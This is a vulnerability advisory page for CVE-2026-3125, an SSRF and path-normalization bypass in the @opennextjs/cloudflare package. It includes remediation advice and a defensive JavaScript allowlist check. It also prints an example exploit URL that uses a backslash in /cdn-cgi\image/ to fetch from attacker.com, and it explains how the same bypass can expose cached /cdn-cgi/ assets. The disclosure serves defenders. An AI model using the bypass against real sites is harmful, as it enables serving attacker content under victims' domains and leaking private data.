Description
A Server-Side Request Forgery (SSRF) vulnerability was identified in the @opennextjs/cloudflare package, resulting from a path normalization bypass in the /cdn-cgi/image/ handler. The @opennextjs/cloudflare worker template includes a /cdn-cgi/image/ handler intended for development use only. In production, Cloudflare's edge intercepts /cdn-cgi/image/ requests before they reach the Worker. However, by substituting a backslash for a forward slash (/cdn-cgi\image/ instead of /cdn-cgi/image/), an attacker can bypass edge interception and have the request reach the Worker directly. The JavaScript URL class then normalizes the backslash to a forward slash, causing the request to match the handler and trigger an unvalidated fetch of arbitrary remote URLs.

For example:

https://victim-site.com/cdn-cgi\image/aaaa/https://attacker.com

In this example, attacker-controlled content from attacker.com is served through the victim site's domain (victim-site.com), violating the same-origin policy and potentially misleading users or other services.

Note: This bypass only works via HTTP clients that preserve backslashes in paths (e.g., curl --path-as-is). Browsers normalize backslashes to forward slashes before sending requests.

Additionally, Cloudflare Workers with Assets and Cloudflare Pages suffer from a similar vulnerability. Assets stored under /cdn-cgi/ paths are not publicly accessible under normal conditions. However, using the same backslash bypass (/cdn-cgi\... instead of /cdn-cgi/...), these assets become publicly accessible. This could be used to retrieve private data. For example, Open Next projects store incremental cache data under /cdn-cgi/_next_cache, which could be exposed via this bypass.
Published: 2026-03-04
Score: 7.7 High
EPSS: < 1% Very Low
KEV: No
Impact: Remote Server‑Side Request Forgery that allows arbitrary content to be fetched and served through the victim domain, exposing private data and violating the same‑origin policy
Action: Apply Patch
AI Analysis

Impact

A Server‑Side Request Forgery flaw exists in the @opennextjs/cloudflare adapter for Cloudflare Workers. When the forward slash in the /cdn‑cgi/image/ path is replaced with a backslash, the request bypasses interception at the Cloudflare edge and reaches the Worker, where JavaScript’s URL class normalizes the backslash to a forward slash. The request then matches the handler, enabling an attacker to trigger an unvalidated fetch of any remote URL. The retrieved content is served through the victim’s domain, breaking the same‑origin policy and potentially allowing malicious payloads or sensitive data to be displayed or further accessed by downstream services. The same bypass also exposes previously protected assets under /cdn‑cgi/ paths, such as the cached data stored under /cdn‑cgi/_next_cache in Open Next projects.

Affected Systems

Installed versions of the @opennextjs/cloudflare Node.js package are vulnerable; it is inferred that any deployment using a version older than the patched release 1.17.1 is affected. The flaw also impacts Cloudflare Workers, Pages, and Assets environments that expose /cdn‑cgi/ paths, including the cache stored under /cdn‑cgi/_next_cache in Open Next projects.

Risk and Exploitability

The flaw carries a CVSS v3.1 score of 7.7, marking it as high severity. The EPSS probability is less than 1%, indicating a low likelihood of exploitation. The vulnerability is not listed in CISA’s KEV catalog. Attackers can exploit the bypass using HTTP clients that preserve backslashes, such as curl with the --path-as-is option; this limits the vector to non-browser clients but still permits automated or scripted attacks that could exfiltrate data or serve malicious content through the victim’s domain.

Generated by OpenCVE AI on April 18, 2026 at 10:00 UTC.

Remediation

Vendor Solution

Server-side updates to Cloudflare's Workers platform to block backslash path normalization bypasses for /cdn-cgi requests. The update automatically mitigates the issue for all existing and any future sites deployed to Cloudflare Workers.


OpenCVE Recommended Actions

  • Update the @opennextjs/cloudflare adapter to version 1.17.1 or later, which includes the root‑cause fix that prevents the backslash normalization bypass.
  • Deploy Cloudflare’s platform update that blocks backslash path normalization bypasses for /cdn‑cgi requests, ensuring all existing and future sites on Cloudflare Workers are protected.
  • Remove or disable any development‑only /cdn‑cgi/* handlers from production deployments, or implement strict whitelist checks on remote URLs before fetching to mitigate SSRF.

Generated by OpenCVE AI on April 18, 2026 at 10:00 UTC.
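
The parser mismatch from the Description and the "strict whitelist" recommendation above, as an added example that is not code from @opennextjs/cloudflare or Cloudflare. The function names, the literal prefix check standing in for a filter that runs before the Worker, and the allowlisted host images.example.com are assumptions made for illustration.

```javascript
// Added example; all function and constant names here are hypothetical.
const IMAGE_PREFIX = "/cdn-cgi/image/";
const ALLOWED_IMAGE_HOSTS = new Set(["images.example.com"]); // constructed allowlist

// Path as it appears in the request line, before any URL parsing.
function rawPathOf(rawUrl) {
  const rest = rawUrl.slice(rawUrl.indexOf("://") + 3);
  const start = rest.search(/[\/\\]/);
  return start === -1 ? "/" : rest.slice(start).split(/[?#]/)[0];
}

// Compare a byte-literal prefix match (a simplified stand-in for a filter that
// runs before the Worker) with what the WHATWG URL parser reports.
function describeMismatch(rawUrl) {
  const rawPath = rawPathOf(rawUrl);
  const parsedPath = new URL(rawUrl).pathname; // "\" becomes "/" for http(s)
  return {
    rawPath,
    parsedPath,
    literalMatch: rawPath.startsWith(IMAGE_PREFIX),
    parsedMatch: parsedPath.startsWith(IMAGE_PREFIX),
  };
}

// Guard to run before any fetch: refuse raw backslashes, then allowlist the target.
function checkImageRequest(rawUrl) {
  if (rawPathOf(rawUrl).includes("\\")) {
    return { allow: false, reason: "backslash in raw path" };
  }
  const m = new URL(rawUrl).pathname.match(/^\/cdn-cgi\/image\/[^/]+\/(.+)$/);
  if (!m) return { allow: false, reason: "not an image request" };
  let target;
  try {
    target = new URL(m[1]);
  } catch {
    return { allow: false, reason: "target is not an absolute URL" };
  }
  if (target.protocol !== "https:") return { allow: false, reason: "scheme not allowed" };
  if (!ALLOWED_IMAGE_HOSTS.has(target.hostname)) {
    return { allow: false, reason: "host not allowlisted" };
  }
  return { allow: true, target: target.href };
}

// Constructed input, based on the URL shape shown in the Description.
const bypass = "https://victim-site.com/cdn-cgi\\image/aaaa/https://attacker.com";
console.log(describeMismatch(bypass), checkImageRequest(bypass));
```

The two booleans returned by describeMismatch disagree only for the backslash form, which is the condition a detection rule or request filter can key on.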

Advisories
Source: Github GHSA
ID: GHSA-c7mq-gh6q-6q7c
Title: opennextjs-cloudflare has SSRF vulnerability via /cdn-cgi/ path normalization bypass

History

Mon, 09 Mar 2026 18:00:00 +0000

Values Added:
CPEs: cpe:2.3:a:opennextjs:opennext_for_cloudflare:*:*:*:*:*:node.js:*:*
Metrics: cvssV3_1 {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}


Thu, 05 Mar 2026 09:15:00 +0000

Values Added:
First Time appeared: Opennextjs; Opennextjs opennext For Cloudflare
Vendors & Products: Opennextjs; Opennextjs opennext For Cloudflare

Wed, 04 Mar 2026 19:15:00 +0000

Values Added:
Metrics: ssvc {'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Wed, 04 Mar 2026 18:30:00 +0000

Values Added:
Description: same text as the Description section at the top of this page.
Title: SSRF vulnerability in opennextjs-cloudflare via /cdn-cgi/ path normalization bypass
Weaknesses: CWE-706, CWE-918
References:
Metrics: cvssV4_0 {'score': 7.7, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:H/SI:N/SA:N'}


MITRE

Status: PUBLISHED

Assigner: cloudflare

Published:

Updated: 2026-03-04T18:58:56.614Z

Reserved: 2026-02-24T14:15:54.385Z

Link: CVE-2026-3125

Vulnrichment

Updated: 2026-03-04T18:58:46.967Z

NVD

Status: Analyzed

Published: 2026-03-04T19:16:19.730

Modified: 2026-03-09T17:51:18.853

Link: CVE-2026-3125

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-18T10:15:25Z

Weaknesses